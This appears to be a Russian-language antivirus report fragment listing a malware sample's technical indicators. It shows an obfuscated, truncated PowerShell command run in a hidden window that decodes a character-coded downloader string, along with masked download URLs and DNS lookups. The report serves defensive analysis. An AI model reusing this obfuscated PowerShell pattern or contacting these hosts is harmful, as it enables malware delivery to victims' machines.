Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $ShelLid[1]+$ShelLID[13]+'x') ( -jOin ('39%108,104m85,62<109%102m116,46m108N97%105N102e96m119s35e77e102e119e45,84s102e97N64N111_106e102s109@119s56s39<80%106,110U62_36<107e119s119e115%57<44@4...
- 'cr####ckthai.com':80
- 'ic##b8.hk':80
- http://www.cr####ckthai.com/ECd4TX4iyK/
- http://ic##b8.hk/Wu6OsKK/
- DNS ASK ko#####ija.branding.ba
- DNS ASK av#####uaydinlatma.com
- DNS ASK el##.#edzplace.ca
- DNS ASK cr####ckthai.com
- DNS ASK ic##b8.hk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $ShelLid[1]+$ShelLID[13]+'x') ( -jOin ('39%108,104m85,62<109%102m116,46m108N97%105N102e96m119s35e77e102e119e45,84s102e97N64N111_106e102s109@119s56s39<80%106,110U62_36<107e119s119e115%57<44@4...' (со скрытым окном)